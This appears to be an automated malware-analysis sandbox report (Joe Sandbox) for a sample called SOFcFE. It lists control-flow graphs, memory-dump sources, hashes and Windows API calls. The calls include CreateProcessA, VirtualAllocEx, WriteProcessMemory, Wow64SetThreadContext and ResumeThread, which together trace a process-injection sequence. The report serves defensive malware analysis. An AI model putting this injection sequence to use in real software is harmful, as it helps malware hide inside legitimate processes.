                                                              control_flow_graph 0 926a1cc-926a26d 2 926a2a6-926a2c6 0->2 3 926a26f-926a279 0->3 8 926a2ff-926a32e 2->8 9 926a2c8-926a2d2 2->9 3->2 4 926a27b-926a27d 3->4 6 926a2a0-926a2a3 4->6 7 926a27f-926a289 4->7 6->2 10 926a28d-926a29c 7->10 11 926a28b 7->11 19 926a367-926a421 CreateProcessA 8->19 20 926a330-926a33a 8->20 9->8 12 926a2d4-926a2d6 9->12 10->10 13 926a29e 10->13 11->10 14 926a2d8-926a2e2 12->14 15 926a2f9-926a2fc 12->15 13->6 17 926a2e6-926a2f5 14->17 18 926a2e4 14->18 15->8 17->17 21 926a2f7 17->21 18->17 31 926a423-926a429 19->31 32 926a42a-926a4b0 19->32 20->19 22 926a33c-926a33e 20->22 21->15 24 926a340-926a34a 22->24 25 926a361-926a364 22->25 26 926a34e-926a35d 24->26 27 926a34c 24->27 25->19 26->26 28 926a35f 26->28 27->26 28->25 31->32 42 926a4b2-926a4b6 32->42 43 926a4c0-926a4c4 32->43 42->43 46 926a4b8 42->46 44 926a4c6-926a4ca 43->44 45 926a4d4-926a4d8 43->45 44->45 47 926a4cc 44->47 48 926a4da-926a4de 45->48 49 926a4e8-926a4ec 45->49 46->43 47->45 48->49 50 926a4e0 48->50 51 926a4fe-926a505 49->51 52 926a4ee-926a4f4 49->52 50->49 53 926a507-926a516 51->53 54 926a51c 51->54 52->51 53->54 55 926a51d 54->55 55->55
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0926A40E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID: $7'
                                                              • API String ID: 963392458-2351505057
                                                              • Opcode ID: f58ab52220be03ca3d1a8cdfea8a79e02632fcd005d48e3c53a9d77deb3b7f06
                                                              • Instruction ID: 5ddcf4aa80941dbe7fcf12264a8829649997a6f5a4c5936657a6fa240113cb58
                                                              • Opcode Fuzzy Hash: f58ab52220be03ca3d1a8cdfea8a79e02632fcd005d48e3c53a9d77deb3b7f06
                                                              • Instruction Fuzzy Hash: 8AA15871D1071A8FEB24CF68C945BEEBBB2BF48310F148169E809B7290DB759985CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 57 926a1d8-926a26d 59 926a2a6-926a2c6 57->59 60 926a26f-926a279 57->60 65 926a2ff-926a32e 59->65 66 926a2c8-926a2d2 59->66 60->59 61 926a27b-926a27d 60->61 63 926a2a0-926a2a3 61->63 64 926a27f-926a289 61->64 63->59 67 926a28d-926a29c 64->67 68 926a28b 64->68 76 926a367-926a421 CreateProcessA 65->76 77 926a330-926a33a 65->77 66->65 69 926a2d4-926a2d6 66->69 67->67 70 926a29e 67->70 68->67 71 926a2d8-926a2e2 69->71 72 926a2f9-926a2fc 69->72 70->63 74 926a2e6-926a2f5 71->74 75 926a2e4 71->75 72->65 74->74 78 926a2f7 74->78 75->74 88 926a423-926a429 76->88 89 926a42a-926a4b0 76->89 77->76 79 926a33c-926a33e 77->79 78->72 81 926a340-926a34a 79->81 82 926a361-926a364 79->82 83 926a34e-926a35d 81->83 84 926a34c 81->84 82->76 83->83 85 926a35f 83->85 84->83 85->82 88->89 99 926a4b2-926a4b6 89->99 100 926a4c0-926a4c4 89->100 99->100 103 926a4b8 99->103 101 926a4c6-926a4ca 100->101 102 926a4d4-926a4d8 100->102 101->102 104 926a4cc 101->104 105 926a4da-926a4de 102->105 106 926a4e8-926a4ec 102->106 103->100 104->102 105->106 107 926a4e0 105->107 108 926a4fe-926a505 106->108 109 926a4ee-926a4f4 106->109 107->106 110 926a507-926a516 108->110 111 926a51c 108->111 109->108 110->111 112 926a51d 111->112 112->112
                                                              APIs
                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0926A40E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CreateProcess
                                                              • String ID: $7'
                                                              • API String ID: 963392458-2351505057
                                                              • Opcode ID: b15ac276304eab4f5f93df354787057b296f1d9402fb8226c7a62571aab3ab24
                                                              • Instruction ID: d421965586db28b036ab7942d119334b6a1700a77d6c505ab35dc617154849b8
                                                              • Opcode Fuzzy Hash: b15ac276304eab4f5f93df354787057b296f1d9402fb8226c7a62571aab3ab24
                                                              • Instruction Fuzzy Hash: 79916971D1071A8FEB24CF68C941BEEBBB2BF48310F148169E809B7290DB759985CF91

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 542 4e3185b-4e318a7 543 4e318a9-4e318cd 542->543 544 4e318dd-4e31956 542->544 545 4e318d5-4e318d6 543->545 559 4e318d0 call 4e318f0 543->559 560 4e318d0 call 4e318e4 543->560 561 4e318d0 call 4e3185b 543->561 546 4e31961-4e31968 544->546 547 4e31958-4e3195e 544->547 548 4e31973-4e31a12 CreateWindowExW 546->548 549 4e3196a-4e31970 546->549 547->546 551 4e31a14-4e31a1a 548->551 552 4e31a1b-4e31a53 548->552 549->548 551->552 556 4e31a60 552->556 557 4e31a55-4e31a58 552->557 558 4e31a61 556->558 557->556 558->558 559->545 560->545 561->545
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: a20f1d7a40abfddc11dc49dfa11dbfbbba80d173181a86117e07b6add6e43734
                                                              • Instruction ID: 3b76994dc8491bc696f077da6373b84ce0309e6e935502395d1540f7a0dc44fc
                                                              • Opcode Fuzzy Hash: a20f1d7a40abfddc11dc49dfa11dbfbbba80d173181a86117e07b6add6e43734
                                                              • Instruction Fuzzy Hash: 136120B1C04348AFDF06CFA9C894ADDBFB2BF49300F15816AE858AB261D7319956CF51

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 562 4e318e4-4e31956 563 4e31961-4e31968 562->563 564 4e31958-4e3195e 562->564 565 4e31973-4e31a12 CreateWindowExW 563->565 566 4e3196a-4e31970 563->566 564->563 568 4e31a14-4e31a1a 565->568 569 4e31a1b-4e31a53 565->569 566->565 568->569 573 4e31a60 569->573 574 4e31a55-4e31a58 569->574 575 4e31a61 573->575 574->573 575->575
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 0191df4eae619568834bdecd95dae465bb0b6a4ef84cb810452000acd03f3f73
                                                              • Instruction ID: 36e61b5f99ca254ff7d9af9165bd9d9a8e258481fa7693bb4bfad13a03a4d699
                                                              • Opcode Fuzzy Hash: 0191df4eae619568834bdecd95dae465bb0b6a4ef84cb810452000acd03f3f73
                                                              • Instruction Fuzzy Hash: F251C0B1D103499FDB15CF99C884ADDFBB2BF48314F24822EE819AB250D775A985CF50

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 576 4e318f0-4e31956 577 4e31961-4e31968 576->577 578 4e31958-4e3195e 576->578 579 4e31973-4e31a12 CreateWindowExW 577->579 580 4e3196a-4e31970 577->580 578->577 582 4e31a14-4e31a1a 579->582 583 4e31a1b-4e31a53 579->583 580->579 582->583 587 4e31a60 583->587 588 4e31a55-4e31a58 583->588 589 4e31a61 587->589 588->587 589->589
                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04E31A02
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID:
                                                              • API String ID: 716092398-0
                                                              • Opcode ID: 3b9185ff66b9fc648fa0e50432f4349d179171ebcd24dd5202921bdc45b8c53a
                                                              • Instruction ID: f2cfb3ef752ac7f940fbdac7a681bef8ed1626397a2a887052da89569c3ae8b5
                                                              • Opcode Fuzzy Hash: 3b9185ff66b9fc648fa0e50432f4349d179171ebcd24dd5202921bdc45b8c53a
                                                              • Instruction Fuzzy Hash: 9541AEB1D103499FDB15CF99C884ADEFBB5BF48314F24822EE819AB210D775A945CF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 590 26744b0-26759d9 CreateActCtxA 593 26759e2-2675a3c 590->593 594 26759db-26759e1 590->594 601 2675a3e-2675a41 593->601 602 2675a4b-2675a4f 593->602 594->593 601->602 603 2675a51-2675a5d 602->603 604 2675a60 602->604 603->604 605 2675a61 604->605 605->605
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 026759C9
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: 7c2b37f13d422c1d1ce2d7766247bb7e295eebe74fdbd72840b48a2c0cfe0e86
                                                              • Instruction ID: 9459b7c682bf1a62541475a4a1c868e46254c608e7103976a7107e9ed54dcb99
                                                              • Opcode Fuzzy Hash: 7c2b37f13d422c1d1ce2d7766247bb7e295eebe74fdbd72840b48a2c0cfe0e86
                                                              • Instruction Fuzzy Hash: 0041E271C0071DCBEB24DFA9C884B8DBBF5BF49314F60816AD409AB251DB75694ACF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 607 4e34040-4e3407c 608 4e34082-4e34087 607->608 609 4e3412c-4e3414c 607->609 610 4e340da-4e34112 CallWindowProcW 608->610 611 4e34089-4e340c0 608->611 615 4e3414f-4e3415c 609->615 612 4e34114-4e3411a 610->612 613 4e3411b-4e3412a 610->613 618 4e340c2-4e340c8 611->618 619 4e340c9-4e340d8 611->619 612->613 613->615 618->619 619->615
                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04E34101
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1454698023.0000000004E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E30000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_4e30000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: CallProcWindow
                                                              • String ID:
                                                              • API String ID: 2714655100-0
                                                              • Opcode ID: 62dc70d4cff1c55986ab6a781a5ef155ab20029e9e5eb4b52c7b180a07c95afd
                                                              • Instruction ID: 5010328d85cfc78a057efe46f7688c550e7e621567ae53ff52244b92c4ec481d
                                                              • Opcode Fuzzy Hash: 62dc70d4cff1c55986ab6a781a5ef155ab20029e9e5eb4b52c7b180a07c95afd
                                                              • Instruction Fuzzy Hash: 374145B4A002099FDB15CF99C848BAABBF5FB88314F248458D418AB361D335A841CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 621 2675913 622 267591c-26759d9 CreateActCtxA 621->622 624 26759e2-2675a3c 622->624 625 26759db-26759e1 622->625 632 2675a3e-2675a41 624->632 633 2675a4b-2675a4f 624->633 625->624 632->633 634 2675a51-2675a5d 633->634 635 2675a60 633->635 634->635 636 2675a61 635->636 636->636
                                                              APIs
                                                              • CreateActCtxA.KERNEL32(?), ref: 026759C9
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: Create
                                                              • String ID:
                                                              • API String ID: 2289755597-0
                                                              • Opcode ID: c0e4699e12fd33b6b298e126cf272d2f0b90f0953337128c5d55009e9a8d11af
                                                              • Instruction ID: 7244cc5b92bb65fa10edc366a5d80aaba88b647ed2061e019846e0caf65707b4
                                                              • Opcode Fuzzy Hash: c0e4699e12fd33b6b298e126cf272d2f0b90f0953337128c5d55009e9a8d11af
                                                              • Instruction Fuzzy Hash: F041CEB1C00719CBEB24DFA9C8847CDBBB5BF48314F60816AD419AB251DB75694ACF90

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 638 9269f49-9269f9e 640 9269fa0-9269fac 638->640 641 9269fae-9269fed WriteProcessMemory 638->641 640->641 643 9269ff6-926a026 641->643 644 9269fef-9269ff5 641->644 644->643
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09269FE0
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 731622d40bba85c1fcf8809ae63ce810e24544b535d2e279858871c468a491c4
                                                              • Instruction ID: 845d6b0b8ae9a7109e8a1810fcd374db2b6c722765cf079fabd89a533f8e2d6f
                                                              • Opcode Fuzzy Hash: 731622d40bba85c1fcf8809ae63ce810e24544b535d2e279858871c468a491c4
                                                              • Instruction Fuzzy Hash: 82213575D103099FDB14CFA9C881BEEBBF1FF88310F10852AE959A7250CB799981CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 648 9269f50-9269f9e 650 9269fa0-9269fac 648->650 651 9269fae-9269fed WriteProcessMemory 648->651 650->651 653 9269ff6-926a026 651->653 654 9269fef-9269ff5 651->654 654->653
                                                              APIs
                                                              • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 09269FE0
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessWrite
                                                              • String ID:
                                                              • API String ID: 3559483778-0
                                                              • Opcode ID: 42f834ffab12be6037de2f86fb86a28d0ce974ce3715bdbbae359374c682e94c
                                                              • Instruction ID: a9fc1a0e28d6183300aae0db0aa66c9fbe93427d8e13fbd52228af19a3d85412
                                                              • Opcode Fuzzy Hash: 42f834ffab12be6037de2f86fb86a28d0ce974ce3715bdbbae359374c682e94c
                                                              • Instruction Fuzzy Hash: 57213975D103099FDB10DFAAC885BEEBBF5FF48310F108429E919A7250CB799941CBA0

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 658 926997b-92699cb 660 92699cd-92699d9 658->660 661 92699db-9269a0b Wow64SetThreadContext 658->661 660->661 663 9269a14-9269a44 661->663 664 9269a0d-9269a13 661->664 664->663
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 092699FE
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: 196378945bc10e465af43a7d2cee948299259e6a98bfdca71a399a203a185721
                                                              • Instruction ID: 007076bf3f90094b417585cef68eb9d935b00a6b6c80c04c90bd9709cdf4b0fc
                                                              • Opcode Fuzzy Hash: 196378945bc10e465af43a7d2cee948299259e6a98bfdca71a399a203a185721
                                                              • Instruction Fuzzy Hash: 63213775D103098FDB14DFAAC4857EEBBF4EF88324F14842AD459A7240CB799985CFA1

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 668 926a038-926a0cd ReadProcessMemory 671 926a0d6-926a106 668->671 672 926a0cf-926a0d5 668->672 672->671
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0926A0C0
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: 21c73071ae1c0c4c44e7d58d9568d2d4e9057b813e53265bf5ea0c3f5246c5d4
                                                              • Instruction ID: f91eccc0157c3451d31a1d7717986942e309a76b5b7c4c617277541277defc45
                                                              • Opcode Fuzzy Hash: 21c73071ae1c0c4c44e7d58d9568d2d4e9057b813e53265bf5ea0c3f5246c5d4
                                                              • Instruction Fuzzy Hash: CD212471C103499FDB10DFAAC881BEEBBF1FF48310F10842AE919A7250C7399941CB60

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 676 267d29c-267d744 DuplicateHandle 678 267d746-267d74c 676->678 679 267d74d-267d76a 676->679 678->679
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0267D676,?,?,?,?,?), ref: 0267D737
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 5e1a75666e818f54db7d6a7973a02c16667d53bd1a7009939679a6438be9141f
                                                              • Instruction ID: 4bd0309ab49af38fccaa54d13b01af8be9bdaaf4e76b867221ed1109b0c8fadf
                                                              • Opcode Fuzzy Hash: 5e1a75666e818f54db7d6a7973a02c16667d53bd1a7009939679a6438be9141f
                                                              • Instruction Fuzzy Hash: 8F21D2B5900249AFDB10CFAAD984ADEBBF4EB48310F14841AE918A7350D375A951CFA5
                                                              APIs
                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 092699FE
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: ContextThreadWow64
                                                              • String ID:
                                                              • API String ID: 983334009-0
                                                              • Opcode ID: d4ada33d0b40214831f256cf8d4a6260d5cb50e2c403966a8ba832e38b079a48
                                                              • Instruction ID: 8964ac6edad6e348da9523e070f9c0f9a4d20122481e3698b59d81a9ff60f17e
                                                              • Opcode Fuzzy Hash: d4ada33d0b40214831f256cf8d4a6260d5cb50e2c403966a8ba832e38b079a48
                                                              • Instruction Fuzzy Hash: D7214775D103098FDB10DFAAC485BEEBBF4EF48324F14842AD459A7240CB78A985CFA1
                                                              APIs
                                                              • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0926A0C0
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MemoryProcessRead
                                                              • String ID:
                                                              • API String ID: 1726664587-0
                                                              • Opcode ID: ec72359161474e2b702c718fda46a97802efc4c4f2014ec1d66b9d71fbb511d3
                                                              • Instruction ID: 84e4b144402b7b381528832f64ac878afb68d105c5b911d49e49e8d6d1a60bff
                                                              • Opcode Fuzzy Hash: ec72359161474e2b702c718fda46a97802efc4c4f2014ec1d66b9d71fbb511d3
                                                              • Instruction Fuzzy Hash: 1F212871C003499FDB10DFAAC841BEEBBF5FF48310F508429E919A7250C7799941DBA1
                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0267D676,?,?,?,?,?), ref: 0267D737
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID:
                                                              • API String ID: 3793708945-0
                                                              • Opcode ID: 499d1f3206e9c5df1ccbcba951353483ad65df406e18171f68d60521bc81d0b9
                                                              • Instruction ID: 06b27222a63ca42d03d272c9481cd42768275c14c0a67a774f7ebd78295dcdb7
                                                              • Opcode Fuzzy Hash: 499d1f3206e9c5df1ccbcba951353483ad65df406e18171f68d60521bc81d0b9
                                                              • Instruction Fuzzy Hash: FC2112B5D00249DFDB10CFA9E584ADEBBF5EB48310F14842AE968A3350C378A954CF61
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: b2a345254688c2f0b8787b928cdc5be4f6d571bb14c60c6868ce000f69b16ae3
                                                              • Instruction ID: e83a5a10d0b52262e07355cfadb8b9e39de3eca88155c0ece9ee9bdc13170f73
                                                              • Opcode Fuzzy Hash: b2a345254688c2f0b8787b928cdc5be4f6d571bb14c60c6868ce000f69b16ae3
                                                              • Instruction Fuzzy Hash: 78114971C003498FDB24DFAAC4457EEFBF4EF89324F24841AD455A7250CA769545CFA0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09269EFE
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2cddf51a7707a80066fec1c1330896b983dddbe17e07ebb229fc3342d2ea4689
                                                              • Instruction ID: f0a85b97dd0ad9b74d7549b1a88a2436075146c70c5a71bc0e898d552f835860
                                                              • Opcode Fuzzy Hash: 2cddf51a7707a80066fec1c1330896b983dddbe17e07ebb229fc3342d2ea4689
                                                              • Instruction Fuzzy Hash: C7115675C003499FDB24DFA9C845BEEBBF5EF88320F14841AE519A7250CB769981CFA0
                                                              APIs
                                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 09269EFE
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: 2c4e112b7cdb7dc2bb847dc397f9339bb88e9005f45614019dddcc452bcfb5f4
                                                              • Instruction ID: 67ea8b5e6562d17c2651bc8784eb99b0949a1fea433d36417c53b99fbc2d8e9f
                                                              • Opcode Fuzzy Hash: 2c4e112b7cdb7dc2bb847dc397f9339bb88e9005f45614019dddcc452bcfb5f4
                                                              • Instruction Fuzzy Hash: 08113775C003499FDB20DFAAC845BDEBBF5EF88324F148419E515A7250CB769940CFA1
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: ResumeThread
                                                              • String ID:
                                                              • API String ID: 947044025-0
                                                              • Opcode ID: 4c91c51cd255e170dec9e1be091eeec45af5d97fa1ad27584f85a241813dafad
                                                              • Instruction ID: 68cc9d2916a2234f9a63e3c755b542bb7d5768379f4560b066e679130e4da2d6
                                                              • Opcode Fuzzy Hash: 4c91c51cd255e170dec9e1be091eeec45af5d97fa1ad27584f85a241813dafad
                                                              • Instruction Fuzzy Hash: 95115571C003498FDB24DFAAC8457AEFBF4AB88220F208419D419A7240CA39A941CFA0
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0267B01E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 5c2701a25a9b22dc7a25d8b977a397fea63d0e0deb48feeb319dab8083ccf357
                                                              • Instruction ID: 35a1da7d265d637eb32704c0276295f4560d8f391e82eb153d80fa3bb7d80ff0
                                                              • Opcode Fuzzy Hash: 5c2701a25a9b22dc7a25d8b977a397fea63d0e0deb48feeb319dab8083ccf357
                                                              • Instruction Fuzzy Hash: C611F0B5C006498FCB20DF9AD444BDEFBF4EB88314F10841AD429A7600D37AA546CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0926D395
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: 6d69de8e82be390eeac9872c6a4c78c6386f6415310dc8ea1b9e327d3d187202
                                                              • Instruction ID: 341baba6b40bbdbbb4bf6b878be662a4b566e01c56f8103aeed2f90e6d3f6a12
                                                              • Opcode Fuzzy Hash: 6d69de8e82be390eeac9872c6a4c78c6386f6415310dc8ea1b9e327d3d187202
                                                              • Instruction Fuzzy Hash: 3B11E3B58003499FDB10DF9AC845BDEBFF4EB59310F20845AD419A7650C375A584CFA1
                                                              APIs
                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 0926D395
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1456934437.0000000009260000.00000040.00000800.00020000.00000000.sdmp, Offset: 09260000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_9260000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: MessagePost
                                                              • String ID:
                                                              • API String ID: 410705778-0
                                                              • Opcode ID: a30f2d4c06100a0f5d0dab3220544cc26d67024274b7cdda76129f11e92a3f4c
                                                              • Instruction ID: 65ffb0be75c9da4de72b321f29c5863396cdb85fa69a67f0b3134232472e5ee8
                                                              • Opcode Fuzzy Hash: a30f2d4c06100a0f5d0dab3220544cc26d67024274b7cdda76129f11e92a3f4c
                                                              • Instruction Fuzzy Hash: EB1133B590034D9FDB20DF8AC845BDEFBF8EB48320F108419E918A7650C375A990CFA1
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0267B01E
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.1450818791.0000000002670000.00000040.00000800.00020000.00000000.sdmp, Offset: 02670000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_2670000_SOFcFE.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: 38ffb4fdfbec57fc88230659bef638c3cc14ee51a70b438e29b48d75a23bfd2b
